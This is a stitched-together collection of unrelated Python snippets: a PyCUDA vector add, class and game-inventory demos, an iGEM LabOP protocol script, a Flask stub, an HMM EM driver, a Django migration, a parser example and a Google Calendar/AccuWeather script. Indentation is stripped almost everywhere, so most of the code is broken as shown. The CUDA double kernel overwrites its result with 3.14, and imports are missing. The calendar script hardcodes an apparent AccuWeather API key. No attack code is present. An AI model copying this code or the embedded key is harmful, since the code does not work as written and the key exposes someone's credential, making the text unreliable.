import pycuda.autoinit
from pycuda.compiler import SourceModule
mod = SourceModule("""
#define X 0
#define Y 1
#define Z 2
__device__ __forceinline__ void add3d_local(float *a_local, float *b)
{
a_local[X] += b[X];
a_local[Y] += b[Y];
a_local[Z] += b[Z];
}
__device__ __forceinline__ void add3d_local_d(double *a_local, double *b)
{
a_local[X] += b[X];
a_local[Y] += b[Y];
a_local[Z] += b[Z];
}
__global__ void add_helper_float(float *a_local, float *b){
add3d_local(a_local, b);
}
__global__ void add_helper_double(double *a_local, double *b){
add3d_local_d(a_local, b);
*a_local = 3.14;
}
""")
f_f = mod.get_function("add_helper_float")
f_d = mod.get_function("add_helper_double")
def add3d_local_float(a_local: np.ndarray, b: np.ndarray) -> None:
"""
a_local += b
Parameters
----------
    a_local : 3-component vector, added to in place
    b : 3-component vector
Returns None
-------
"""
f_f(drv.InOut(a_local), drv.In(b), block=(1, 1, 1), grid=(1, 1))
def add3d_local_double(a_local: np.ndarray, b: np.ndarray) -> None:
"""
a_local += b
Parameters
----------
    a_local : 3-component vector, added to in place
    b : 3-component vector
Returns None
-------
"""
f_d(drv.InOut(a_local), drv.In(b), block=(1, 1, 1), grid=(1, 1))
|
class Demo:
def __init__(self, v1=11, v2=22):
self.__a = v1
self.__b = v2
def get_a(self):
return self.__a
def get_b(self):
return self.__b
def set_a(self, value):
self.__a = value
def set_b(self, value):
self.__b = value
def do_something(self):
return self.__a + self.__b
d = Demo(11)
print(d.do_something())
d.set_a(5)
print(d.do_something())
# File: class_demo7.py
# Author: Kaiching Chang
# Date: July, 2014
|
def communication_module(packet):
p1 = int(packet[8:12])
p2 = int(packet[12:16])
    # The first character of the instruction selects the operation:
    # '0' -> 0F12 (add), 'B' -> B7A2 (subtract), 'C' -> C3D9 (multiply)
    a = {'0':p1+p2, 'B':p1-p2, 'C':p1*p2}
    t = a[packet[4]]
if t > 9999:
t = str('9999')
elif t < 0:
t = str('0000')
else:
t = str(t)
return packet[0:4] + 'FFFF' + str((4-len(t)) * '0') + str(t) + '0000' + packet[-4:]
'''
We need you to implement a method of receiving commands over a network,
processing the information and responding.
Our device will send a single packet to you containing data and an instruction
which you must perform before returning your reply.
To keep things simple, we will be passing a single "packet" as a string.
Each "byte" contained in the packet is represented by 4 chars.
One packet is structured as below:
Header Instruction Data1 Data2 Footer
------ ------ ------ ------ ------
H1H1 0F12 0012 0008 F4F4
------ ------ ------ ------ ------
The string received in this case would be - "H1H10F1200120008F4F4"
Instruction: The calculation you should perform, always one of the below.
0F12 = Addition
B7A2 = Subtraction
C3D9 = Multiplication
FFFF = This instruction code should be used to identify your return value.
The Header and Footer are unique identifiers which you must use to form your reply.
Data1 and Data2 are the decimal representation of the data you should apply
your instruction to. i.e 0109 = 109.
Your response must include the received header/footer, a "FFFF" instruction code,
and the result of your calculation stored in Data1.
Data2 should be zero'd out to "0000".
To give a complete example:
If you receive message "H1H10F1200120008F4F4".
The correct response would be "H1H1FFFF00200000F4F4"
In the event that your calculation produces a negative result, the value returned
should be "0000", similarily if the value is above 9999 you should return "9999".
'''
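# Illustrative usage (not part of the original snippet), reusing the worked
# example from the description above:
print(communication_module("H1H10F1200120008F4F4"))  # expected: "H1H1FFFF00200000F4F4"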
|
"""
http://2018.igem.org/wiki/images/0/09/2018_InterLab_Plate_Reader_Protocol.pdf
"""
import json
import sys
from urllib.parse import quote
import sbol3
from tyto import OM
import labop
import uml
from labop.execution_engine import ExecutionEngine
from labop_convert import MarkdownSpecialization
def render_kit_coordinates_table(ex: labop.ProtocolExecution):
# Get iGEM parts from Document
components = [
c
for c in ex.document.objects
if type(c) is sbol3.Component and "igem" in c.types[0]
]
# Extract kit coordinates from description, assuming description has the following
# format: 'BBa_I20270 Kit Plate 1 Well 1A'
components = [
(
c.description.split(" ")[0], # Part ID
" ".join(c.description.split(" ")[1:]),
) # Kit coordinates
for c in components
]
# Format markdown table
table = (
"#### Table 1: Part Locations in Distribution Kit\n"
"| Part | Coordinate |\n"
"| ---- | -------------- |\n"
)
for part, coordinate in components:
table += f"|{part}|{coordinate}|\n"
table += "\n\n"
# Insert into markdown document immediately before the Protocol Steps section
insert_index = ex.markdown.find("## Protocol Steps")
ex.markdown = ex.markdown[:insert_index] + table + ex.markdown[insert_index:]
if "unittest" in sys.modules:
REGENERATE_ARTIFACTS = False
else:
REGENERATE_ARTIFACTS = True
filename = "".join(__file__.split(".py")[0].split("/")[-1:])
doc = sbol3.Document()
sbol3.set_namespace("http://igem.org/engineering/")
#############################################
# Import the primitive libraries
print("Importing libraries")
labop.import_library("liquid_handling")
print("... Imported liquid handling")
labop.import_library("plate_handling")
# print('... Imported plate handling')
labop.import_library("spectrophotometry")
print("... Imported spectrophotometry")
labop.import_library("sample_arrays")
print("... Imported sample arrays")
labop.import_library("culturing")
#############################################
# create the materials to be provisioned
dh5alpha = sbol3.Component("dh5alpha", "https://identifiers.org/taxonomy:668369")
dh5alpha.name = "_E. coli_ DH5 alpha"
doc.add(dh5alpha)
lb_cam = sbol3.Component("lb_cam", "")
lb_cam.name = "LB Broth+chloramphenicol"
doc.add(lb_cam)
chloramphenicol = sbol3.Component(
"chloramphenicol", "https://pubchem.ncbi.nlm.nih.gov/compound/5959"
)
chloramphenicol.name = "chloramphenicol"
doc.add(chloramphenicol)
neg_control_plasmid = sbol3.Component(
"neg_control_plasmid", "http://parts.igem.org/Part:BBa_J428100"
)
neg_control_plasmid.name = "Negative control 2022"
neg_control_plasmid.description = "BBa_J428100 Kit Plate 1 Well 12M"
pos_control_green_plasmid = sbol3.Component(
"pos_control_green_plasmid", "http://parts.igem.org/Part:BBa_J428112"
)
pos_control_green_plasmid.name = "Positive control 2022 Green"
pos_control_green_plasmid.description = (
"3_Colors_ins_K2656022 BBa_J428112 Kit Plate 1 Well 14C"
)
pos_control_red_plasmid = sbol3.Component(
"pos_control_red_plasmid", "http://parts.igem.org/Part:BBa_J428101"
)
pos_control_red_plasmid.name = "Positive control red (mCherry) Exp 2"
pos_control_red_plasmid.description = "BBa_J428101 Kit Plate 1 Well 12I"
test_device1 = sbol3.Component("test_device1", "http://parts.igem.org/Part:BBa_J428106")
test_device1.name = "Test Device 1 Exp 2 (Dual construct Green and Blue)"
test_device1.description = "BBa_J428106 Kit Plate 1 Well 12G"
test_device2 = sbol3.Component("test_device2", "http://parts.igem.org/Part:BBa_J428107")
test_device2.name = "Test Device 2 Exp 2 (Dual construct Green and Red)"
test_device2.description = "BBa_J428107 Kit Plate 1 Well 3L"
test_device3 = sbol3.Component("test_device3", "http://parts.igem.org/Part:BBa_J428105")
test_device3.name = "Test Device 3 Exp 2 (Dual construct Red and Blue)"
test_device3.description = "BBa_J428105 Kit Plate 1 Well 5J"
test_device4 = sbol3.Component("test_device4", "http://parts.igem.org/Part:BBa_J428108")
test_device4.name = "Test Device 4 Exp 2 (Dual construct Blue and Red)"
test_device4.description = "BBa_J428108 Kit Plate 1 Well 14E"
test_device5 = sbol3.Component("test_device5", "http://parts.igem.org/Part:BBa_J428104")
test_device5.name = "Test Device 5 Exp 2 (Dual construct Red and Green)"
test_device5.description = "DC_R_ins_K2656022 BBa_J428104 Kit Plate 1 Well 5L"
doc.add(neg_control_plasmid)
doc.add(pos_control_green_plasmid)
doc.add(pos_control_red_plasmid)
doc.add(test_device1)
doc.add(test_device2)
doc.add(test_device3)
doc.add(test_device4)
doc.add(test_device5)
protocol = labop.Protocol("interlab")
protocol.name = "Using the three color calibration protocol: Does the order of transcritional units influence their expression strength?"
protocol.version = sbol3.TextProperty(
protocol, "http://igem.org/interlab_working_group#Version", 0, 1, [], "1.0b"
)
protocol.description = """In this experiment, your team will measure the fluorescence of six devices that encode two fluorescence proteins in two transcriptional units. The devices differ in the order of the transcriptional units. You will calibrate the fluorescence of these devices to the calibrant dyes and the optical density of the culture to the cell density calibrant.
This experiment aims to assess the lab-to-lab reproducibility of the three color calibration protocol when two fluorescent proteins are expressed in the same cell. Besides this technical question, it also adresses a fundamental synthetic biology question: does the order of the transcritional units (that encode for the two different fluorescent proteins) on the devices influence their expression levels?"""
doc.add(protocol)
protocol = doc.find(protocol.identity)
plasmids = [
neg_control_plasmid,
pos_control_green_plasmid,
pos_control_red_plasmid,
test_device1,
test_device2,
test_device3,
test_device4,
test_device5,
]
# Day 1: Transformation
transformation = protocol.primitive_step(
f"Transform", host=dh5alpha, dna=plasmids, selection_medium=lb_cam
)
# Day 2: Pick colonies and culture overnight
culture_container_day1 = protocol.primitive_step(
"ContainerSet",
quantity=2 * len(plasmids),
specification=labop.ContainerSpec(
"culture_day_1",
name=f"culture (day 1)",
queryString="cont:CultureTube",
prefixMap={"cont": "https://sift.net/container-ontology/container-ontology#"},
),
)
overnight_culture = protocol.primitive_step(
"Culture",
inoculum=transformation.output_pin("transformants"),
replicates=2,
growth_medium=lb_cam,
volume=sbol3.Measure(5, OM.millilitre), # Actually 5-10 ml in the written protocol
duration=sbol3.Measure(16, OM.hour), # Actually 16-18 hours
orbital_shake_speed=sbol3.Measure(220, None), # No unit for RPM or inverse minutes
temperature=sbol3.Measure(37, OM.degree_Celsius),
container=culture_container_day1.output_pin("samples"),
)
# Day 3 culture
culture_container_day2 = protocol.primitive_step(
"ContainerSet",
quantity=2 * len(plasmids),
specification=labop.ContainerSpec(
"culture_day_2",
name=f"culture (day 2)",
queryString="cont:CultureTube",
prefixMap={"cont": "https://sift.net/container-ontology/container-ontology#"},
),
)
back_dilution = protocol.primitive_step(
"Dilute",
source=culture_container_day1.output_pin("samples"),
destination=culture_container_day2.output_pin("samples"),
replicates=2,
diluent=lb_cam,
amount=sbol3.Measure(5.0, OM.millilitre),
dilution_factor=uml.LiteralInteger(value=10),
temperature=sbol3.Measure(4, OM.degree_Celsius),
)
# Transfer cultures to a microplate baseline measurement and outgrowth
timepoint_0hrs = protocol.primitive_step(
"ContainerSet",
quantity=2 * len(plasmids),
specification=labop.ContainerSpec(
"culture_0hr_timepoint",
name="cultures (0 hr timepoint)",
queryString="cont:MicrofugeTube",
prefixMap={"cont": "https://sift.net/container-ontology/container-ontology#"},
),
)
hold = protocol.primitive_step(
"Hold",
location=timepoint_0hrs.output_pin("samples"),
temperature=sbol3.Measure(4, OM.degree_Celsius),
)
hold.description = "This will prevent cell growth while transferring samples."
transfer = protocol.primitive_step(
"Transfer",
source=culture_container_day2.output_pin("samples"),
destination=timepoint_0hrs.output_pin("samples"),
amount=sbol3.Measure(1, OM.milliliter),
temperature=sbol3.Measure(4, OM.degree_Celsius),
)
baseline_absorbance = protocol.primitive_step(
"MeasureAbsorbance",
samples=timepoint_0hrs.output_pin("samples"),
wavelength=sbol3.Measure(600, OM.nanometer),
)
baseline_absorbance.name = "baseline absorbance of culture (day 2)"
conical_tube = protocol.primitive_step(
"ContainerSet",
quantity=2 * len(plasmids),
specification=labop.ContainerSpec(
"back_diluted_culture",
name=f"back-diluted culture",
queryString="cont:50mlConicalTube",
prefixMap={"cont": "https://sift.net/container-ontology/container-ontology#"},
),
)
conical_tube.description = (
"The conical tube should be opaque, amber-colored, or covered with foil."
)
dilution = protocol.primitive_step(
"DiluteToTargetOD",
source=culture_container_day2.output_pin("samples"),
destination=conical_tube.output_pin("samples"),
diluent=lb_cam,
amount=sbol3.Measure(12, OM.millilitre),
target_od=sbol3.Measure(0.02, None),
temperature=sbol3.Measure(4, OM.degree_Celsius),
) # Dilute to a target OD of 0.2, opaque container
dilution.description = " Use the provided Excel sheet to calculate this dilution. Reliability of the dilution upon Abs600 measurement: should stay between 0.1-0.9"
embedded_image = protocol.primitive_step(
"EmbeddedImage", image="/Users/bbartley/Dev/git/sd2/labop/fig1_cell_calibration.png"
)
temporary = protocol.primitive_step(
"ContainerSet",
quantity=2 * len(plasmids),
specification=labop.ContainerSpec(
"back_diluted_culture_aliquots",
name="back-diluted culture aliquots",
queryString="cont:MicrofugeTube",
prefixMap={"cont": "https://sift.net/container-ontology/container-ontology#"},
),
)
hold = protocol.primitive_step(
"Hold",
location=temporary.output_pin("samples"),
temperature=sbol3.Measure(4, OM.degree_Celsius),
)
hold.description = "This will prevent cell growth while transferring samples."
transfer = protocol.primitive_step(
"Transfer",
source=conical_tube.output_pin("samples"),
destination=temporary.output_pin("samples"),
amount=sbol3.Measure(1, OM.milliliter),
temperature=sbol3.Measure(4, OM.degree_Celsius),
)
plate1 = protocol.primitive_step(
"EmptyContainer",
specification=labop.ContainerSpec(
"plate_1",
name="plate 1",
queryString="cont:Plate96Well",
prefixMap={"cont": "https://sift.net/container-ontology/container-ontology#"},
),
)
hold = protocol.primitive_step(
"Hold",
location=plate1.output_pin("samples"),
temperature=sbol3.Measure(4, OM.degree_Celsius),
)
plan = labop.SampleData(
values=quote(
json.dumps(
{
"1": "A2:D2",
"2": "E2:H2",
"3": "A3:D3",
"4": "E3:H3",
"5": "A4:D4",
"6": "E4:H4",
"7": "A5:D5",
"8": "E5:H5",
"9": "A7:D7",
"10": "E7:H7",
"11": "A8:D8",
"12": "E8:H8",
"13": "A9:D9",
"14": "E9:H9",
"15": "A10:D10",
"16": "E10:H10",
}
)
)
)
transfer = protocol.primitive_step(
"TransferByMap",
source=timepoint_0hrs.output_pin("samples"),
destination=plate1.output_pin("samples"),
amount=sbol3.Measure(100, OM.microliter),
temperature=sbol3.Measure(4, OM.degree_Celsius),
plan=plan,
)
transfer.description = "See also the plate layout below."
plate_blanks = protocol.primitive_step(
"Transfer",
source=[lb_cam],
destination=plate1.output_pin("samples"),
coordinates="A1:H1, A10:H10, A12:H12",
temperature=sbol3.Measure(4, OM.degree_Celsius),
amount=sbol3.Measure(100, OM.microliter),
)
plate_blanks.description = "These samples are blanks."
embedded_image = protocol.primitive_step(
"EmbeddedImage", image="/Users/bbartley/Dev/git/sd2/labop/fig2_cell_calibration.png"
)
# Possibly display map here
absorbance_plate1 = protocol.primitive_step(
"MeasureAbsorbance",
samples=plate1.output_pin("samples"),
wavelength=sbol3.Measure(600, OM.nanometer),
)
absorbance_plate1.name = "0 hr absorbance timepoint"
fluorescence_plate1 = protocol.primitive_step(
"MeasureFluorescence",
samples=plate1.output_pin("samples"),
excitationWavelength=sbol3.Measure(488, OM.nanometer),
emissionWavelength=sbol3.Measure(530, OM.nanometer),
emissionBandpassWidth=sbol3.Measure(30, OM.nanometer),
)
fluorescence_plate1.name = "0 hr green fluorescence timepoint"
fluorescence_blue_plate1 = protocol.primitive_step(
"MeasureFluorescence",
samples=plate1.output_pin("samples"),
excitationWavelength=sbol3.Measure(405, OM.nanometer),
emissionWavelength=sbol3.Measure(450, OM.nanometer),
emissionBandpassWidth=sbol3.Measure(50, OM.nanometer),
)
fluorescence_blue_plate1.name = "0 hr blue fluorescence timepoint"
fluorescence_red_plate1 = protocol.primitive_step(
"MeasureFluorescence",
samples=plate1.output_pin("samples"),
excitationWavelength=sbol3.Measure(561, OM.nanometer),
emissionWavelength=sbol3.Measure(610, OM.nanometer),
emissionBandpassWidth=sbol3.Measure(20, OM.nanometer),
)
fluorescence_red_plate1.name = "0 hr red fluorescence timepoint"
# Begin outgrowth
incubate = protocol.primitive_step(
"Incubate",
location=conical_tube.output_pin("samples"),
duration=sbol3.Measure(6, OM.hour),
temperature=sbol3.Measure(37, OM.degree_Celsius),
shakingFrequency=sbol3.Measure(220, None),
)
# Hold on ice to inhibit cell growth
hold = protocol.primitive_step(
"Hold",
location=timepoint_0hrs.output_pin("samples"),
temperature=sbol3.Measure(4, OM.degree_Celsius),
)
hold.description = (
"This will inhibit cell growth during the subsequent pipetting steps."
)
# Take a 6hr timepoint measurement
timepoint_6hrs = protocol.primitive_step(
"ContainerSet",
quantity=len(plasmids) * 2,
specification=labop.ContainerSpec(
"timepoint_6hr",
name=f"6hr timepoint",
queryString="cont:MicrofugeTube",
prefixMap={"cont": "https://sift.net/container-ontology/container-ontology#"},
),
)
plate2 = protocol.primitive_step(
"EmptyContainer",
specification=labop.ContainerSpec(
"plate_2",
name="plate 2",
queryString="cont:Plate96Well",
prefixMap={"cont": "https://sift.net/container-ontology/container-ontology#"},
),
)
# Hold on ice
hold = protocol.primitive_step(
"Hold",
location=timepoint_6hrs.output_pin("samples"),
temperature=sbol3.Measure(4, OM.degree_Celsius),
)
hold.description = "This will prevent cell growth while transferring samples."
hold = protocol.primitive_step(
"Hold",
location=plate2.output_pin("samples"),
temperature=sbol3.Measure(4, OM.degree_Celsius),
)
transfer = protocol.primitive_step(
"Transfer",
source=conical_tube.output_pin("samples"),
destination=timepoint_6hrs.output_pin("samples"),
temperature=sbol3.Measure(4, OM.degree_Celsius),
amount=sbol3.Measure(1, OM.milliliter),
)
plan = labop.SampleData(
values=quote(
json.dumps(
{
"1": "A2:D2",
"2": "E2:H2",
"3": "A3:D3",
"4": "E3:H3",
"5": "A4:D4",
"6": "E4:H4",
"7": "A5:D5",
"8": "E5:H5",
"9": "A7:D7",
"10": "E7:H7",
"11": "A8:D8",
"12": "E8:H8",
"13": "A9:D9",
"14": "E9:H9",
"15": "A10:D10",
"16": "E10:H10",
}
)
)
)
transfer = protocol.primitive_step(
"TransferByMap",
source=timepoint_6hrs.output_pin("samples"),
destination=plate2.output_pin("samples"),
amount=sbol3.Measure(100, OM.microliter),
temperature=sbol3.Measure(4, OM.degree_Celsius),
plan=plan,
)
transfer.description = "See the plate layout."
# Plate the blanks
plate_blanks = protocol.primitive_step(
"Transfer",
source=[lb_cam],
destination=plate2.output_pin("samples"),
coordinates="A1:H1, A10:H10, A12:H12",
temperature=sbol3.Measure(4, OM.degree_Celsius),
amount=sbol3.Measure(100, OM.microliter),
)
plate_blanks.description = "These are the blanks."
endpoint_absorbance_plate2 = protocol.primitive_step(
"MeasureAbsorbance",
samples=plate2.output_pin("samples"),
wavelength=sbol3.Measure(600, OM.nanometer),
)
endpoint_absorbance_plate2.name = "6 hr absorbance timepoint"
endpoint_fluorescence_plate2 = protocol.primitive_step(
"MeasureFluorescence",
samples=plate2.output_pin("samples"),
excitationWavelength=sbol3.Measure(485, OM.nanometer),
emissionWavelength=sbol3.Measure(530, OM.nanometer),
emissionBandpassWidth=sbol3.Measure(30, OM.nanometer),
)
endpoint_fluorescence_plate2.name = "6 hr green fluorescence timepoint"
endpoint_fluorescence_blue_plate2 = protocol.primitive_step(
"MeasureFluorescence",
samples=plate2.output_pin("samples"),
excitationWavelength=sbol3.Measure(405, OM.nanometer),
emissionWavelength=sbol3.Measure(450, OM.nanometer),
emissionBandpassWidth=sbol3.Measure(50, OM.nanometer),
)
endpoint_fluorescence_blue_plate2.name = "6 hr blue fluorescence timepoint"
endpoint_fluorescence_red_plate2 = protocol.primitive_step(
"MeasureFluorescence",
samples=plate2.output_pin("samples"),
excitationWavelength=sbol3.Measure(561, OM.nanometer),
emissionWavelength=sbol3.Measure(610, OM.nanometer),
emissionBandpassWidth=sbol3.Measure(20, OM.nanometer),
)
endpoint_fluorescence_red_plate2.name = "6 hr red fluorescence timepoint"
protocol.designate_output(
"measurements",
"http://bioprotocols.org/labop#SampleData",
source=baseline_absorbance.output_pin("measurements"),
)
protocol.designate_output(
"measurements",
"http://bioprotocols.org/labop#SampleData",
source=absorbance_plate1.output_pin("measurements"),
)
protocol.designate_output(
"measurements",
"http://bioprotocols.org/labop#SampleData",
source=fluorescence_plate1.output_pin("measurements"),
)
protocol.designate_output(
"measurements",
"http://bioprotocols.org/labop#SampleData",
source=fluorescence_blue_plate1.output_pin("measurements"),
)
protocol.designate_output(
"measurements",
"http://bioprotocols.org/labop#SampleData",
source=fluorescence_red_plate1.output_pin("measurements"),
)
protocol.designate_output(
"measurements",
"http://bioprotocols.org/labop#SampleData",
source=endpoint_absorbance_plate2.output_pin("measurements"),
)
protocol.designate_output(
"measurements",
"http://bioprotocols.org/labop#SampleData",
source=endpoint_fluorescence_plate2.output_pin("measurements"),
)
protocol.designate_output(
"measurements",
"http://bioprotocols.org/labop#SampleData",
source=endpoint_fluorescence_blue_plate2.output_pin("measurements"),
)
protocol.designate_output(
"measurements",
"http://bioprotocols.org/labop#SampleData",
source=endpoint_fluorescence_red_plate2.output_pin("measurements"),
)
agent = sbol3.Agent("test_agent")
ee = ExecutionEngine(
specializations=[MarkdownSpecialization("test_LUDOX_markdown.md")],
failsafe=False,
sample_format="json",
)
execution = ee.execute(protocol, agent, id="test_execution", parameter_values=[])
# Post-process the markdown to add a table that shows where each
# iGEM part is contained in the parts distribution kit
render_kit_coordinates_table(execution)
print(execution.markdown)
execution.markdown = execution.markdown.replace("`_E. coli_", "_`E. coli`_ `")
if REGENERATE_ARTIFACTS:
with open(filename + ".md", "w", encoding="utf-8") as f:
f.write(execution.markdown)
|
from flask import Flask, render_template, request
from flask_bootstrap import Bootstrap
app = Flask(__name__)
Bootstrap(app)
@app.route('/')
def index():
return render_template('index.html')
@app.route('/query', methods = ['POST'])
def query():
query = request.form['q']
# execute amazon asin read codes
return 'query'
if __name__ == '__main__':
app.run(debug = True)
|
class Inventory(object):
def __init__(self, stuff=[]):
self.items = []
self.equips = {0:0, 1:0, 2:0, 3:0, 4:0, 5:0, 6:0, 7:0, 8:0}
# 1 equip slots:
# 2 head
# 3 torso/arms
# 4 hands
# 5 fingers
# 6 weapon (stuff you actually hold)
# 7 legs
# 8 feet
for i in stuff:
self.items.append(i)
def add_item(self, item):
self.items.append(item)
def remove_item(self, item):
self.items.remove(item)
def equip_item(self, item, slot):
if item not in self.items:
return False
else:
if self.equips[slot] != 0:
return False
else:
self.equips[slot] = item
return "You equip the " + item.description + " " + item.name
    def unequip_item(self, item, slot):
        # mirrors equip_item: the item must be owned and currently occupy the slot
        if item not in self.items or self.equips[slot] != item:
            return False
        self.equips[slot] = 0
        return "You unequip the " + item.description + " " + item.name
|
import scipy.io
import numpy as np
import matplotlib.pyplot as plt
import aux_functions
import EM
file = scipy.io.loadmat('./observed.mat')
X = file['observed']
N = np.shape(X)[0] # number of sequences 10
D = np.shape(X[0][0])[0] # dimension of sequences 6
T = np.shape(X[0][0])[1] # length of each sequence 100
max_it = 100
Ks_list = [2,3,4,5] #[2,3,4,5]
Num_inis = 3
max_it= 100
converged = False
num_k = len(Ks_list)
ll_ks_opt = []
A_ks_opt = []
B_ks_opt = []
pi_ks_opt = []
gamma_ks_opt = []
pb_ks_opt = []
for K in Ks_list:
print('--------------------------')
print(' K = '+str(K))
print('--------------------------')
ll_inis = np.zeros((Num_inis,1))
pi_est_inis = np.zeros((Num_inis,1,K))
#pi_est_inis = np.zeros((Num_inis))
A_est_inis = np.zeros((Num_inis,K,K))
B_est_inis = np.zeros((Num_inis,K,D))
gamma_inis = np.zeros((Num_inis,N,K,T))
pb_inis = np.zeros((Num_inis, N, K, T))
Q_total = []
for ini in range(Num_inis):
pi_est = np.zeros((1, K))
A_est = np.zeros((K, K))
B_est = np.zeros((K, D))
gamma = np.zeros((N,K,T))
pb = np.zeros((N, K, T))
print('--------- Initialization: '+str(ini)+' ---------\n\n')
# Parameter initialization
[pi_ini,A_ini,B_ini] = aux_functions.initialize(K, D)
[pi_est, A_est, B_est, gamma, Q_tot, Q, pb] = EM.EM_algorithm(X,pi_ini,A_ini,B_ini, N, max_it ,ini)
pi_est_inis[ini,:,:] = pi_est
A_est_inis[ini,:,:] = A_est
B_est_inis[ini,:,:] = B_est
gamma_inis[ini,:,:,:] = gamma
ll_inis[ini] = Q
pb_inis[ini,:,:,:] = pb
Q_total.append(Q_tot)
    # Best model for all iterations and one particular initialization
ini_opt = np.argmax(ll_inis)
ll_ks_opt.append(ll_inis[ini_opt][0])
A_ks_opt.append(A_est_inis[ini_opt])
B_ks_opt.append(B_est_inis[ini_opt])
pi_ks_opt.append(pi_est_inis[ini_opt])
gamma_ks_opt.append(gamma_inis[ini_opt])
pb_ks_opt.append(pb_inis[ini_opt])
# Best model (best K)
k_opt = np.argmax(ll_ks_opt) + Ks_list[0]
print('----- OPTIMAL K: '+str(k_opt)+'------')
ll_k_opt = ll_ks_opt[k_opt-Ks_list[0]]
A_k_opt = A_ks_opt[k_opt-Ks_list[0]]
B_k_opt = B_ks_opt[k_opt-Ks_list[0]]
pi_k_opt = pi_ks_opt[k_opt-Ks_list[0]]
gamma_opt = gamma_ks_opt[k_opt-Ks_list[0]]
pb_opt = pb_ks_opt[k_opt-Ks_list[0]]
# FOR DECODING: UNCOMMENT AND TRY WITH JUST ONE K
'''
# MAP decoder (FB algorithm)
states_MAP = aux_functions.MAP_decoder(gamma_opt)
# ML decoder (viterbi)
states_ML = aux_functions.Viterbi_decoder(pi_k_opt, A_k_opt, pb_opt)
print(' States MAP decoder \n')
print(states_MAP)
print(' States Viterbi decoder \n')
print(states_ML)
for n in range(N):
x = np.linspace(0,T,100)
plt.plot(x,states_MAP[n],'-',label = 'MAP decoder')
plt.plot(x, states_ML[n],'--',label = 'Viterbi decoder')
plt.xlabel('Observations')
plt.ylabel('Sequence '+str(n))
plt.title(' MAP and Viterbi sequence decoder for K='+str(K))
plt.legend(loc='upper right')
plt.savefig('Decoded_sequence_K' + str(K)+'_N='+str(n))
plt.show()
'''
|
def solution(prices):
answer = [0 for i in range(len(prices))]
index = []
for i in range(len(prices)):
for j in index.copy():
if prices[j] > prices[i]:
answer[j] = i - j
index.remove(j)
if i == len(prices)-1:
answer[j] = len(prices) - j - 1
index.append(i)
return answer
|
from azureml.widgets import RunDetails
RunDetails(run).show()
run.wait_for_completion(show_output=True)
|
# Generated by Django 3.1.2 on 2020-11-06 15:51
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Episode',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('show_id', models.CharField(max_length=255, unique=True)),
],
),
migrations.CreateModel(
name='Note',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('text', models.TextField()),
('category', models.CharField(choices=[('TSTP', 'Timestamp'), ('LNK', 'Link')], max_length=4)),
('episode', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='episodes.episode')),
],
),
]
|
import csv
''' WRITES THE PLACES
places_file = open("/home/mateus/Documents/TESIIII/versao_final_en/places.txt", "r").read().splitlines()
with open('/home/mateus/Documents/TESIIII/mydata.csv', 'w') as mycsvfile:
writer = csv.writer(mycsvfile, quoting=csv.QUOTE_ALL)
writer.writerow(["PLACES:"])
for place in places_file:
writer.writerow([place])'''
''' WRITES THE PEOPLE
persons_file = open("/home/mateus/Documents/TESIIII/versao_final_en/persons.txt", "r").read().splitlines()
with open('/home/mateus/Documents/TESIIII/persons.csv', 'w') as mycsvfile:
writer = csv.writer(mycsvfile, quoting=csv.QUOTE_ALL)
writer.writerow(["PERSONS:"])
for person in persons_file:
writer.writerow([person])'''
# WRITES THE RELATIONS
'''relations_file = open("/home/mateus/Documents/TESIIII/versao_final_en/relations.txt", "r").read().splitlines()
with open('/home/mateus/Documents/TESIIII/relations.csv', 'w') as mycsvfile:
writer = csv.writer(mycsvfile, quoting=csv.QUOTE_ALL)
writer.writerow(["RELATIONS:"])
for relation in relations_file:
writer.writerow([relation])'''
|
"""
Infix parsing with operator precedence (inefficient implementation).
"""
from parson import Grammar, recur, seclude, either, fail
def PrececedenceParser(primary_expr, table):
return foldr(lambda make_expr, subexpr: make_expr(subexpr),
primary_expr,
table)
def LeftAssoc(*pairs):
return lambda subexpr: \
seclude(subexpr + alt([peg + subexpr + oper
for peg, oper in pairs]).star())
def RightAssoc(*pairs):
return lambda subexpr: \
recur(lambda expr:
seclude(subexpr + alt([peg + expr + oper
for peg, oper in pairs]).maybe()))
def alt(pegs):
return foldr(either, fail, pegs)
def foldr(f, z, xs):
for x in reversed(xs):
z = f(x, z)
return z
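# foldr folds from the right: foldr(f, z, [a, b, c]) == f(a, f(b, f(c, z))).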
# eg_calc.py example
from operator import *
from parson import delay
_ = delay(lambda: g._)
exp3 = delay(lambda: g.exp3)
exp1 = PrececedenceParser(exp3, [
LeftAssoc(('*'+_, mul), ('//'+_, div), ('/'+_, truediv), ('%'+_, mod)),
RightAssoc(('^'+_, pow)),
])
exps = PrececedenceParser(exp1, [
LeftAssoc(('+'+_, add), ('-'+_, sub)),
])
g = Grammar(r"""
top = _ :exps !/./.
exp3 : '('_ :exps ')'_
| '-'_ :exp1 :neg
| /(\d+)/_ :int.
_ = /\s*/.
""")(**globals())
## g.top('42 *(5-3) + -2^2')
#. (80,)
## g.top('2^3^2')
#. (512,)
## g.top('5-3-1')
#. (1,)
## g.top('3//2')
#. (1,)
## g.top('3/2')
#. (1.5,)
|
import datetime
import pickle
import os.path
from googleapiclient.discovery import build
from google_auth_oauthlib.flow import InstalledAppFlow
from google.auth.transport.requests import Request
import requests
import json
import os
# If modifying these scopes, delete the file token.pickle.
SCOPES = ['https://www.googleapis.com/auth/calendar.events', ]
POSTAL_CODE_ENDPOINT = 'http://dataservice.accuweather.com/locations/v1/postalcodes/search?'
FORECAST_ENDPOINT = 'http://dataservice.accuweather.com/forecasts/v1/daily/5day'
API_KEY = 'tFebxs08CTJJGx1E3HwSpIEqGGElXsaN'
ZIP_CODE = '20147'
def remove_event(service,_id):
event_id = service.events().delete(calendarId='primary', eventId=_id).execute()
def main():
creds = None
# The file token.pickle stores the user's access and refresh tokens, and is
# created automatically when the authorization flow completes for the first
# time.
if os.path.exists('token.pickle'):
with open('token.pickle', 'rb') as token:
creds = pickle.load(token)
# If there are no (valid) credentials available, let the user log in.
if not creds or not creds.valid:
if creds and creds.expired and creds.refresh_token:
creds.refresh(Request())
else:
flow = InstalledAppFlow.from_client_secrets_file(
'credentials.json', SCOPES)
creds = flow.run_local_server(port=0)
# Save the credentials for the next run
with open('token.pickle', 'wb') as token:
pickle.dump(creds, token)
service = build('calendar', 'v3', credentials=creds)
